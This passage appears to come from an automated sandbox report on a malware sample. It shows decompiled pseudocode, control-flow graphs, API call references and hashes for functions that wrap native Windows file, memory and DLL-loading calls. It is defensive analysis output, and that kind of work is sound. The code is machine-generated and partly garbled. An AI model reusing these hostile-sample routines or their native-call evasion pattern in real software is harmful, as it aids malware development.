                                                    			E0041E7CD(void* _a4, PVOID* _a8, long _a12, long* _a16, long _a20, long _a24) {
				intOrPtr _v0;
				long _t14;

				_t10 = _v0;
				E0041F243( *((intOrPtr*)(_v0 + 0x14)), _t10, _t10 + 0xa8c,  *((intOrPtr*)(_v0 + 0x14)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				return _t14;
			}





                                                    0x0041e7d6
                                                    0x0041e7ea
                                                    0x0041e80c
                                                    0x0041e810

                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E80C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331080035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_tqxwmam.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID: ($
                                                    • API String ID: 2167126740-1917586925
                                                    • Opcode ID: 41196e49ac4ea828d442559080510825f434a657ed3d3ee46247645fae91569f
                                                    • Instruction ID: 75c01ba8265e86b6e799f606f6827c4ef4659bfb27b3c208fb82fe6623ca5877
                                                    • Opcode Fuzzy Hash: 41196e49ac4ea828d442559080510825f434a657ed3d3ee46247645fae91569f
                                                    • Instruction Fuzzy Hash: 63F015B6210208BBCB14DF89DC81EEB77ADAF88754F118159BE08A7241C630FD11CBB4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041E5ED Relevance: 1.6, APIs: 1, Instructions: 70filenativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 176 41e5ed-41e5f1 177 41e5f3-41e644 call 41f243 NtCreateFile 176->177 178 41e5b5-41e5ec call 41f243 176->178
                                                    C-Code - Quality: 60%
                                                    			E0041E5ED(char __ecx, char* __edx, void* __eflags, long _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				intOrPtr* __esi;
				void* __ebp;
				void* _t35;
				intOrPtr* _t36;

				asm("out 0x1e, eax");
				 *__edx = __ecx;
				if(__eflags > 0) {
					asm("in al, dx");
					_t23 = _a8;
					_t3 = _t23 + 0xa68; // 0xa90
					_t36 = _t3;
					E0041F243(_a8[5], _t23, _t36, _a8[5], 0, 0x27);
					return  *((intOrPtr*)( *_t36))(_a12, _a16, _a20, _a24, _a28, _t35);
				} else {
					__ebp = __esp;
					__eax = _a4;
					__ecx =  *((intOrPtr*)(__eax + 0x14));
					_t11 = __eax + 0xa6c; // 0xa6c
					__esi = _t11;
					__eax = E0041F243( *((intOrPtr*)(__eax + 0x14)), __eax, __esi,  *((intOrPtr*)(__eax + 0x14)), 0, 0x28);
					__edx = _a48;
					__eax = _a44;
					__ecx = _a40;
					__edx = _a36;
					__eax = _a32;
					__ecx = _a28;
					__edx = _a24;
					__eax = _a20;
					__ecx = _a16;
					__edx = _a12;
					__eax = _a8;
					__ecx =  *__esi;
					__eax = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
					__esi = __esi;
					__ebp = __ebp;
					return __eax;
				}
			}







                                                    0x0041e5ed
                                                    0x0041e5ef
                                                    0x0041e5f1
                                                    0x0041e5b5
                                                    0x0041e5b6
                                                    0x0041e5c2
                                                    0x0041e5c2
                                                    0x0041e5ca
                                                    0x0041e5ec
                                                    0x0041e5f3
                                                    0x0041e5f4
                                                    0x0041e5f6
                                                    0x0041e5f9
                                                    0x0041e602
                                                    0x0041e602
                                                    0x0041e60a
                                                    0x0041e60f
                                                    0x0041e612
                                                    0x0041e615
                                                    0x0041e61c
                                                    0x0041e620
                                                    0x0041e624
                                                    0x0041e628
                                                    0x0041e62c
                                                    0x0041e630
                                                    0x0041e634
                                                    0x0041e638
                                                    0x0041e63c
                                                    0x0041e640
                                                    0x0041e642
                                                    0x0041e643
                                                    0x0041e644
                                                    0x0041e644

                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00000000,?,0041935F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041935F,?,00000000,00000060,00000000,00000000), ref: 0041E640
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331080035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_tqxwmam.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: c2940defc1f95fd30518e2f85d8637610e3b44d043bb621822615bc0800cbd0f
                                                    • Instruction ID: bf58b033f4df4117e7473d6230dd595e805d3fddb0b0a0f6bc399e62227eb295
                                                    • Opcode Fuzzy Hash: c2940defc1f95fd30518e2f85d8637610e3b44d043bb621822615bc0800cbd0f
                                                    • Instruction Fuzzy Hash: C71112B2604208BFCB08DF98DC85EEB37ADEF8C754F048258BA0C97241D631E951CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040CF23 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 200 40cf23-40cf3f 201 40cf47-40cf4c 200->201 202 40cf42 call 420f13 200->202 203 40cf52-40cf60 call 421433 201->203 204 40cf4e-40cf51 201->204 202->201 207 40cf70-40cf81 call 41f7b3 203->207 208 40cf62-40cf6d call 4216b3 203->208 213 40cf83-40cf97 LdrLoadDll 207->213 214 40cf9a-40cf9d 207->214 208->207 213->214
                                                    C-Code - Quality: 100%
                                                    			E0040CF23(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_t24 = _a8;
				_v8 =  &_v536;
				_t15 = E00420F13( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E00421433(_v8, _t24, __eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E004216B3( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041F7B3(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                    0x0040cf2c
                                                    0x0040cf3f
                                                    0x0040cf42
                                                    0x0040cf47
                                                    0x0040cf4c
                                                    0x0040cf56
                                                    0x0040cf5b
                                                    0x0040cf5e
                                                    0x0040cf60
                                                    0x0040cf68
                                                    0x0040cf6d
                                                    0x0040cf6d
                                                    0x0040cf74
                                                    0x0040cf7c
                                                    0x0040cf7f
                                                    0x0040cf81
                                                    0x0040cf95
                                                    0x00000000
                                                    0x0040cf97
                                                    0x0040cf9d
                                                    0x0040cf51
                                                    0x0040cf51
                                                    0x0040cf51

                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040CF95
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331080035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_tqxwmam.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: 2d8971ab7e40216f1ab7880a6b3bd7b14f9e717b1ef25046fbf816b69d0e01bc
                                                    • Instruction ID: 5e04f6221a37e6357fdc510ce1da2c9258563d4a4a23712c115eaecd70357e5d
                                                    • Opcode Fuzzy Hash: 2d8971ab7e40216f1ab7880a6b3bd7b14f9e717b1ef25046fbf816b69d0e01bc
                                                    • Instruction Fuzzy Hash: D30152B1E4010EABDF10DBA1DD82F9EB3789B54308F0042A6E908A7280F634EB448B95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041E69D Relevance: 1.5, APIs: 1, Instructions: 42filenativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 215 41e69d-41e6a1 216 41e6a3-41e6ec call 41f243 NtReadFile 215->216 217 41e6ed-41e6ef 215->217
                                                    APIs
                                                    • NtReadFile.NTDLL(00419523,004149F3,FFFFFFFF,0041900D,00000002,?,00419523,00000002,0041900D,FFFFFFFF,004149F3,00419523,00000002,00000000), ref: 0041E6E8
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331080035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_tqxwmam.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 32c8df3c70d67261ae50247031a770c3232371363107fb8c2be793b250d4e9c9
                                                    • Instruction ID: afefd89c63c408e271d207366b207e4e6e1d150e5249734bbce09756756f7a8e
                                                    • Opcode Fuzzy Hash: 32c8df3c70d67261ae50247031a770c3232371363107fb8c2be793b250d4e9c9
                                                    • Instruction Fuzzy Hash: 2FF014B6200208AFCB04DF9ACC84EEB77A9EF8C754F118258BE0D97240D630E941CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041E5F3 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 220 41e5f3-41e644 call 41f243 NtCreateFile
                                                    C-Code - Quality: 100%
                                                    			E0041E5F3(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xa6c; // 0xa6c
				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                                    0x0041e602
                                                    0x0041e60a
                                                    0x0041e640
                                                    0x0041e644

                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00000000,?,0041935F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041935F,?,00000000,00000060,00000000,00000000), ref: 0041E640
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331080035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_tqxwmam.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: ff6043353ceb920c5c6b95fa545531b6d027e3119837083dac9160f643623646
                                                    • Instruction ID: 896d7442baf9be4756d905739e1f90aa296932759f722aab2a73c44ca3a6dc04
                                                    • Opcode Fuzzy Hash: ff6043353ceb920c5c6b95fa545531b6d027e3119837083dac9160f643623646
                                                    • Instruction Fuzzy Hash: D3F0BDB2204208ABCB08CF89DC85EEB37ADAF8C754F018248BA0997241C630E8518BA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041E6A3 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 223 41e6a3-41e6ec call 41f243 NtReadFile
                                                    C-Code - Quality: 37%
                                                    			E0041E6A3(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				intOrPtr* _t27;

				_t3 = _a4 + 0xa74; // 0xa76
				_t27 = _t3;
				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _t13, _t27,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a);
				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t18;
			}





                                                    0x0041e6b2
                                                    0x0041e6b2
                                                    0x0041e6ba
                                                    0x0041e6e8
                                                    0x0041e6ec

                                                    APIs
                                                    • NtReadFile.NTDLL(00419523,004149F3,FFFFFFFF,0041900D,00000002,?,00419523,00000002,0041900D,FFFFFFFF,004149F3,00419523,00000002,00000000), ref: 0041E6E8
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331080035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_tqxwmam.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 2d12266bc7a0f10b7c649805d53fb3a44196c039d978ed09e5374c20c4afdbd2
                                                    • Instruction ID: a52c969a109bbc10a8a1a781a5aa37a0394cb6bb67041f9c77339075023d92d4
                                                    • Opcode Fuzzy Hash: 2d12266bc7a0f10b7c649805d53fb3a44196c039d978ed09e5374c20c4afdbd2
                                                    • Instruction Fuzzy Hash: 4EF0FFB2200208ABCB04DF89DC84EEB77ADAF8C714F018248BA0DA7241C630E8118BA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041E7D3 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 226 41e7d3-41e7e9 227 41e7ef-41e810 NtAllocateVirtualMemory 226->227 228 41e7ea call 41f243 226->228 228->227
                                                    C-Code - Quality: 100%
                                                    			E0041E7D3(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _a4, _t10 + 0xa8c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                                    0x0041e7ea
                                                    0x0041e80c
                                                    0x0041e810

                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E80C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331080035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_tqxwmam.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    • Opcode ID: c6dcf1b2085be2652a56e81aa7d61fbadce5d8b21ef35205e1b29a90b99b07af
                                                    • Instruction ID: 27bf8a3fb07fce7131f8418fc0fb77bd2b10fdbd594230fdd84e61d9d7c2cc87
                                                    • Opcode Fuzzy Hash: c6dcf1b2085be2652a56e81aa7d61fbadce5d8b21ef35205e1b29a90b99b07af
                                                    • Instruction Fuzzy Hash: BBF01EB6200208ABCB18DF89DC81EEB77ADAF88754F018159BE0897241C630F911CBB4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041E723 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0041E723(intOrPtr _a4, void* _a8) {
				long _t8;

				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _a4, _t5 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                                    0x0041e73a
                                                    0x0041e748
                                                    0x0041e74c

                                                    APIs
                                                    • NtClose.NTDLL(00410328,00000000,?,00410328,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E748
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331080035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_tqxwmam.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 830b885a3245526015f54344d79e5b01ded446f9b8a9012b98a688606644bbf8
                                                    • Instruction ID: 9c4ed7dd7ad381e5692115c9670513ce9f617838e6ca6e8741f9ee3af2ac2269
                                                    • Opcode Fuzzy Hash: 830b885a3245526015f54344d79e5b01ded446f9b8a9012b98a688606644bbf8
                                                    • Instruction Fuzzy Hash: 3CD01776604214ABD610EBA9DC89FD77BACDF48664F0184A9BA1C5B242C571FA0086E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC98F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 87374a680de43f512c16b3e2e19905497ccd0422db6d86380cdeb3fb7cea66dd
                                                    • Instruction ID: f3fdf611454ddee9560d5a86adf6a2149ff6160644ef850def56668f56fd361e
                                                    • Opcode Fuzzy Hash: 87374a680de43f512c16b3e2e19905497ccd0422db6d86380cdeb3fb7cea66dd
                                                    • Instruction Fuzzy Hash: E290026565100502D20171694404616100A97D0381F91C033A1024565ECA658992F171
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC9860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 5bd4fbc68472526f075799bf10b9317772f2bd1aa53cb32afeb16b9545a777c3
                                                    • Instruction ID: b03c30204cc92be24be20190b9dbfcaeaba77f5a67c9e5d2e1fafd5958221270
                                                    • Opcode Fuzzy Hash: 5bd4fbc68472526f075799bf10b9317772f2bd1aa53cb32afeb16b9545a777c3
                                                    • Instruction Fuzzy Hash: 0990027525100413D21161694504707100997D0381F91C423A0424568D96968952F161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC9840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 2b9f32c511be2f9a1942b644f478a92a7e428163993d92873a478d2f3efbe1ed
                                                    • Instruction ID: 8ec9afdd4d60e5ed83b412ed8101fff854d4c980f7e25f1c4473eae9ae05e696
                                                    • Opcode Fuzzy Hash: 2b9f32c511be2f9a1942b644f478a92a7e428163993d92873a478d2f3efbe1ed
                                                    • Instruction Fuzzy Hash: A7900265292041525645B16944045075006A7E0381B91C023A1414960C85669856E661
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 6a0b55ff10dd2240b8be2fddbd63a50743d9c48c410caf59c7d2259e50a28fe2
                                                    • Instruction ID: b652d5773aeeffbcf1ebe8822c241ff124206f7d5cdb63f31bcb80539b14df0e
                                                    • Opcode Fuzzy Hash: 6a0b55ff10dd2240b8be2fddbd63a50743d9c48c410caf59c7d2259e50a28fe2
                                                    • Instruction Fuzzy Hash: C49002A539100442D20061694414B061005D7E1341F51C026E1064564D8659CC52B166
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 57a712b834352b829ed1dc36c0f83cdcacea90b457814fefddea977ec74641b6
                                                    • Instruction ID: 1dc34e4ed8ec24531d329aaacdf2451ea0c67c83a57086d3142912ddd227d33f
                                                    • Opcode Fuzzy Hash: 57a712b834352b829ed1dc36c0f83cdcacea90b457814fefddea977ec74641b6
                                                    • Instruction Fuzzy Hash: 429002A525200003420571694414616500A97E0341F51C032E10145A0DC5658891B165
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC9910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: a7c310abdd104c2e4761f2a54f7eb125b8cc91b30cdd165f7491559cbfc0a1cf
                                                    • Instruction ID: 64cd28f814ba95d8a88a814c0cc1ea938c87f7dcf400e65f350c327baaa780df
                                                    • Opcode Fuzzy Hash: a7c310abdd104c2e4761f2a54f7eb125b8cc91b30cdd165f7491559cbfc0a1cf
                                                    • Instruction Fuzzy Hash: 4D9002B525100402D24071694404746100597D0341F51C022A5064564E86998DD5B6A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC9540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: dde6d0e089b8a94eeaf8b2713f714206cb1c98d4193302f06771c9fc75b61ec0
                                                    • Instruction ID: 4da27a0785d6bc998ad137808472617d44b041785d7b3c45c52e42b8e100f8c2
                                                    • Opcode Fuzzy Hash: dde6d0e089b8a94eeaf8b2713f714206cb1c98d4193302f06771c9fc75b61ec0
                                                    • Instruction Fuzzy Hash: A7900269261000030205A5690704507104697D5391751C032F1015560CD6618861A161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 3c0d8dc826c374a127620585521f69409d50dd0deb1a8e390a43262786bd557f
                                                    • Instruction ID: 9b6e7c6d56abe2c6bf7ac78ac96acd86c6f1bc9ffcb6ed08383de1a3b7aa9b6e
                                                    • Opcode Fuzzy Hash: 3c0d8dc826c374a127620585521f69409d50dd0deb1a8e390a43262786bd557f
                                                    • Instruction Fuzzy Hash: 1F90027525108802D2106169840474A100597D0341F55C422A4424668D86D58891B161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC9A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 862ba9fc128ecdfa807e60d8b92b8a3268757c92aac29754748a660def59a7e0
                                                    • Instruction ID: 2d878a4abe6c2abe378ccade2bd99b25ec38516a10a08321ee955ac5846c2c77
                                                    • Opcode Fuzzy Hash: 862ba9fc128ecdfa807e60d8b92b8a3268757c92aac29754748a660def59a7e0
                                                    • Instruction Fuzzy Hash: A4900265651000424240717988449065005BBE1351B51C132A0998560D85998865A6A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC9A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 87c6514985171da0666242b9b9c25290592c4c4f4546e1ad5deb6aad311d92c7
                                                    • Instruction ID: c11dc4f8bf4cc83ca56aed057db7074838c7653921fbadda8873a6d40c0e4df8
                                                    • Opcode Fuzzy Hash: 87c6514985171da0666242b9b9c25290592c4c4f4546e1ad5deb6aad311d92c7
                                                    • Instruction Fuzzy Hash: CB90027525140402D2006169481470B100597D0342F51C022A1164565D86658851B5B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC9660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: f50c3b33332f2b22d9c74bf978f8bcd676c9084d92f7b9a7bbc5e6a33a139132
                                                    • Instruction ID: e1b58dad502d362dc74a73ca19ca1444325efb9f213a2d7892fe76630b1cdf33
                                                    • Opcode Fuzzy Hash: f50c3b33332f2b22d9c74bf978f8bcd676c9084d92f7b9a7bbc5e6a33a139132
                                                    • Instruction Fuzzy Hash: D890027525100802D2807169440464A100597D1341F91C026A0025664DCA558A59B7E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC9A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
